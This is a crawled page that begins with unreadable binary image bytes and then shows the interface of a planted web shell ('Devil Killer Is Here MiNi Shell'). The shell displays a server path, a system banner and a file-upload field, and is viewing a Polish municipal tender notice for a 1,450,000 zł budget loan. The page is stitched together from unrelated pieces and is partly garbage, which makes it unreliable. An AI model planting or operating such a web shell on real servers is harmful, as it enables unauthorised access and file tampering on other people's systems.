JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220523/0017278101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ,,Zaciągnięcie w 2022 roku kredytu długoterminowego do kwoty 1 450 000,00 zł, z przeznaczeniem na sfinansowanie planowanego deficytu budżetu”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świerczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412757</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brzeska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-112</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774008069</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug_rolnictwo@swierczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swierczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Zaciągnięcie w 2022 roku kredytu długoterminowego do kwoty 1 450 000,00 zł, z przeznaczeniem na sfinansowanie planowanego deficytu budżetu”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd50aaf0-da94-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00172781</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00012159/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 ,,Zaciągnięcie w 2022 roku kredytu długoterminowego do kwoty 1 450 000,00 zł, z przeznaczeniem na sfinansowanie planowanego deficytu budżetu”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem miniPortalu, który dostępny jest pod adresem https://miniportal.uzp.gov.pl/, ePUAP-u dostępnego pod adresem /yil8537bi6/SkrytkaESP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „Formularza do komunikacji”. <br/>3)	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>4)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji” wynosi 150 MB. <br/>5)	Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>6)	Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. <br/> <br/>2. Złożenie oferty <br/>1)	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. <br/>2)	Ofertę należy zaszyfrować. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: <br/>https://miniportal.uzp.gov.pl/ <br/>3)	Opis sposobu przygotowania oferty zawarty jest w rozdziale XII SWZ. <br/>4)	Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP. <br/> <br/>3. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert oraz załączników składanych wraz z ofertą) <br/>1)	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferty i załączniki składane wraz z ofertą), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal”: „Formularz do komunikacji”. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. <br/>2)	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: ug_rolnictwo@swierczow.pl <br/>3)	We wszelkiej korespondencji związanej z niniejszym postępowaniem <br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania). <br/>4)	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. <br/>5)	Za datę przekazania oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych (innych niż oferty i załączniki składane wraz z ofertą) oraz informacji przyjmuje się datę ich przekazania na ePUAP lub na adres poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO dot. przetwarzania danych<br/>osobowych na podstawie obowiązku prawnego ciążącego na administratorze:1) TOŻSAMOŚĆ<br/>ADMINISTRATORA: Administratorem danych osobowych Wykonawcy przetwarzanych w Urzędzie Gminy Świerczów, REGON:<br/>000543829 jest: Wójt Gminy Świerczów ul. Brzeska 48, 46-112<br/>Świerczów. Z administratorem można skontaktować się pisemnie - kierując korespondencję na adres<br/>siedziby administratora.2) DANE KONTAKTOWE INSPEKTORA OCHRONY DANYCH: Administrator<br/>wyznaczył Inspektora Ochrony Danych Osobowych, z którym kontakt jest możliwy pisemnie na adres<br/>siedziby Administratora, pod numerem tel.: 887818800 lub poprzez e-mail:<br/>biuro@centrumcyfryzacji.pl;3) CELE PRZETWARZANIA I PODSTAWA PRAWNA: Dane Wykonawcy<br/>będą przetwarzane w celu zawarcia i realizacji umowy cywilno-prawnej w zakresie określonym<br/>obowiązującymi przepisami, w tymi przepisami prawa cywilnego; w zakresie wypełniania obowiązków<br/>prawnych ciążących na administratorze na podstawie powszechnie obowiązujących przepisów prawa;<br/>w zakresie gdzie przetwarzanie danych osobowych jest niezbędne do wykonania przez Administratora<br/>celów kontaktowych oraz realizacji praw i obowiązków podmiotów realizujących umowy cywilnoprawne<br/>w ramach, których następuje przekazanie danych osobowych, jak również w celu ustalenia lub<br/>dochodzenia roszczeń lub w celu obrony przed roszczeniami i celach archiwizacyjnych - art. 6 ust. 1 lit.<br/>b, c oraz f RODO.4) ODBIORCY DANYCH: Dane osobowe przekazane w umowach cywilnoprawnych<br/>mogą być udostępniane upoważnionym pracownikom Administratora, członkom organów<br/>Administratora, podmiotom dostarczającym lub utrzymującym infrastrukturę IT Administratora,<br/>podmiotom i osobom świadczącym na rzecz Administratora usługi ubezpieczeniowe, usługi prawne<br/>oraz innym podmiotom, którym Administrator w celu wykonywania praw i obowiązków wynikających z<br/>zawartych umów cywilnoprawnych powierzył dane osobowe (procesorom), a także organom<br/>uprawnionym do otrzymywania danych osobowych na podstawie przepisów prawa. Dane osobowe<br/>Wykonawcy mogą być przekazane wyłącznie podmiotom, które uprawnione są do ich otrzymania<br/>przepisami prawa oraz podmiotom realizującym usługi w imieniu i na rzecz Administratora w zakresie<br/>niezbędnym dla prawidłowego funkcjonowania.5) OKRES PRZECHOWYWANIA DANYCH: Dane<br/>przetwarzane będą przez okres trwania umowy, jak również przez okres trwania wymagalności<br/>ewentualnych roszczeń, zgodnie z art. 118 Ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz.U.<br/>2019 poz. 1145), a po tym czasie przez okres wymagany przez przepisy powszechnie obowiązującego<br/>prawa, w tym w zakresie archiwizacji.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6) PRAWA PODMIOTÓW DANYCH: Posiada Pani/Pan<br/>prawo dostępu do treści danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania,<br/>prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody (jeżeli<br/>przetwarzanie odbywa się na podstawie zgody) w dowolnym momencie bez wpływu na zgodność z<br/>prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem. Wszystkie<br/>wymienione prawa wymagają pisemnej formy.7) PRAWO WNIESIENIA SKARGI DO ORGANU<br/>NADZORCZEGO: Wykonawcy przysługuje prawo wniesienia skargi do organu nadzorczego<br/>zajmującego się ochroną danych osobowych w państwie członkowskim Pani/Pana zwykłego pobytu,<br/>miejsca pracy lub miejsca popełnienia domniemanego naruszenia. Biuro Prezesa Urzędu Ochrony<br/>Danych Osobowych (PUODO) Adres: ul. Stawki 2, 00-193 Warszawa, Telefon: 22 531 03 00.8)<br/>ŹRÓDŁO POCHODZENIA DANYCH OSOBOWYCH: Dane pochodzą od osób których dane dotyczą i zostały udostępnione na podstawie zawartej umowy cywilno-prawnej.9) INFORMACJA O<br/>DOWOLNOŚCI LUB OBOWIĄZKU PODANIA DANYCH: Podanie danych osobowych jest warunkiem<br/>niezbędnym do zawarcia umowy cywilno-prawnej. W przypadku nie podania danych osobowych nie<br/>będzie możliwe jej zawarcie.10) PRZEKAZANIE DANYCH OSOBOWYCH DO PAŃSTWA<br/>TRZECIEGO LUB ORGANIZACJI MIĘDZYNARODOWEJ: Może wystąpić, jeżeli wystąpi o to państwo<br/>trzecie lub organizacja międzynarodowa, jednak po wykazaniu zgodności z przepisami RODO.11)<br/>INFORMACJE O ZAUTOMATYZOWANYM PODEJMOWANIU DECYZJI, W TYM O PROFILOWANIU:<br/>Pani/Pana dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIM.271.04.2022.MH</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest zaciągnięcie w roku 2022 kredytu długoterminowego do kwoty 1 450 000,00 zł, z przeznaczeniem na sfinansowanie planowanego deficytu budżetu; <br/>2)	Kredyt zostanie spłacony w latach 2023-2030<br/>3)	Zamawiający nie przewiduje dodatkowych opłat i prowizji z tytułu udzielenia kredytu oraz innych opłat związanych z przedmiotem niniejszego postępowania.<br/>4)	Zamawiający nie przewiduje dodatkowych opłat i prowizji z tytułu wydawania zaświadczeń, opini oraz za ewentualne sporządzanie aneksów do umowy.<br/>5)	Zamawiający zastrzega sobie prawo niewykorzystania całej kwoty kredytu. Za niewykorzystanie kredytu w pełnej wysokości Zamawiający nie będzie ponosił żadnych opłat.<br/>6)	Zamawiający zastrzega sobie prawo do wcześniejszej spłaty kredytu, bez ponoszenia dodatkowych kosztów.<br/>7)	Zamawiający oświadcza, że nie posiada zaległości wobec ZUS i US oraz, że wszystkie zobowiązania wobec zawartych umów są regulowane na bieżąco.<br/>8)	Spłata kapitału następować będzie w ratach i okresach określonych poniżej:<br/>•	31.03.2023 r. – 25 000,00 zł,<br/>•	30.06.2023 r. – 25 000,00 zł,<br/>•	30.09.2023 r. – 25 000,00 zł,<br/>•	31.12.2023 r. – 25 000,00 zł,<br/>•	31.03.2024 r. – 2 500,00 zł,<br/>•	30.06.2024 r. – 2 500,00 zł,<br/>•	30.09.2024 r. – 2 500,00 zł,<br/>•	31.12.2024 r. – 2 500,00 zł,<br/>•	31.03.2025 r. – 12 500,00 zł,<br/>•	30.06.2025 r. – 12 500,00 zł,<br/>•	30.09.2025 r. – 12 500,00 zł,<br/>•	31.12.2025 r. – 12 500,00 zł,<br/>•	31.03.2026 r. – 25 000,00 zł,<br/>•	30.06.2026 r. – 25 000,00 zł,<br/>•	30.09.2026 r. – 25 000,00 zł,<br/>•	31.12.2026 r. – 25 000,00 zł,<br/>•	31.03.2027 r. – 75 000,00 zł,<br/>•	30.06.2027 r. – 75 000,00 zł,<br/>•	30.09.2027 r. – 75 000,00 zł,<br/>•	31.12.2027 r. – 75 000,00 zł,<br/>•	31.03.2028 r. – 72 500,00 zł,<br/>•	30.06.2028 r. – 72 500,00 zł,<br/>•	30.09.2028 r. – 72 500,00 zł,<br/>•	31.12.2028 r. – 72 500,00 zł,<br/>•	31.03.2029 r. – 75 000,00 zł,<br/>•	30.06.2029 r. – 75 000,00 zł,<br/>•	30.09.2029 r. – 75 000,00 zł,<br/>•	31.12.2029 r. – 75 000,00 zł,<br/>•	31.03.2030 r. – 75 000,00 zł,<br/>•	30.06.2030 r. – 75 000,00 zł,<br/>•	30.09.2030 r. – 75 000,00 zł,<br/>•	31.12.2030 r. – 75 000,00 zł.<br/>9)	Na wekslu własnym in blanco wraz z deklaracją wekslową oraz umowie kredytowej będzie złożona kontrasygnata Skarbnika.<br/>10)	Oświadczenie o poddaniu się do egzekucji zostanie podpisane przez osoby upoważnione wraz z kontrasygnatą Skarbnika do wysokości zaciągniętego zobowiązania.<br/>11)	Oprocentowanie kredytu zmienne oparte o stawkę WIBOR ustaloną na okres 1 M z dnia 20.05.2022 roku, która wynosi 6,46% plus stała marża banku w okresie obowiązywania umowy.<br/>Sprawozdania,	uchwały	oraz	opinie	są	dostępne	na	stronie	internetowej:<br/>	BIP Gminy Świerczów: bip.swierczow.pl<br/>1.2.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w swz i ofercie.<br/>1.3. Powody niedokonania podziału zamówienia na części: nadmierne trudności techniczne, nadmierne koszty wykonania zamówienia oraz trudności skoordynowania działań różnych Wykonawców realizujących poszczególne części zamówienia, które mogłyby poważnie zagrozić właściwemu wykonaniu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2030-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający jako kryterium wyznaczył cenę (A=60%) oraz termin uruchomienia kredytu (B=40%) dlatego w trakcie porównywania ofert obliczy najkorzystniejszą ofertę w następujący sposób:<br/><br/>1)	cena (odsetki) - oferty zostaną ocenione zgodnie ze wzorem arytmetycznym:<br/><br/>P min<br/>An = x 100 pkt.<br/>Pn<br/><br/>An	- liczba punktów przyznana ofercie n za spełnienie kryterium A N	- numer oferty<br/>Pmin	- cena (odsetki) minimalna brutto wśród złożonych ofert Pn	- cena (odsetki) zaproponowana przez Wykonawcę<br/><br/>2) termin uruchomienia kredytu (podany w dniach – maksymalnie 2 dni robocze) od momentu złożenia wniosku o wypłatę transzy kredytu - oferty zostaną ocenione zgodnie ze wzorem arytmetycznym:<br/><br/> T min<br/>Bn = x 100 pkt.<br/>Tn<br/>Bn	- liczba punktów przyznana ofercie n za spełnienie kryterium B n	- numer oferty<br/>Tmin	- minimalny termin udostępnienia kredytu (podany w dniach) wśród złożonych ofert<br/>Tn	- termin udostępnienia kredytu (podany w dniach) zaproponowany przez Wykonawcę n<br/>2) W	celu wyboru najkorzystniejszej oferty w powiązaniu z przedstawionym wyżej kryterium Zamawiający będzie posługiwał się następującym wzorem:<br/>Won= An x 60% + Bn x 40% <br/><br/>Won – wskaźnik oceny ofert<br/>Zamówienie publiczne zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin uruchomienia kredytu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>2.	Dla uznania, że Wykonawca spełnia warunek, o którym mowa w pkt 1, Zamawiający wymaga, aby Wykonawca wykazał, że: <br/>a)	posiada zezwolenie na prowadzenie działalności bankowej na terenie Polski, a także realizację usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2021 r. poz. 2439 z późn. zm.), a w przypadku określonym w art. 178 ust. 1 tejże ustawy inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 Prawo bankowe. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu na wezwanie Zamawiającego Wykonawca zobowiązany będzie do złożenia następujących dokumentów:<br/>1) zezwolenie na prowadzenie działalności bankowej na terenie Polski,<br/>a także realizację usług objętych przedmiotem zamówienia, zgodnie<br/>z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U.<br/>z 2020 r. poz. 1896 z późn. zm.), a w przypadku określonym w art. 178 ust. 1 tejże ustawy inny dokument potwierdzający<br/>rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 Prawo bankowe.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca zobowiązany jest złożyć:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania oraz spełnianiu<br/>warunków udziału<br/>w postępowaniu w zakresie wskazanym przez Zamawiającego – zgodnie<br/>z Załącznikiem nr 2 do SWZ;<br/>w przypadku wspólnego ubiegania się o zamówienie przez wielu wykonawców, oświadczenie składa każdy z wykonawców,<br/>oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>2) 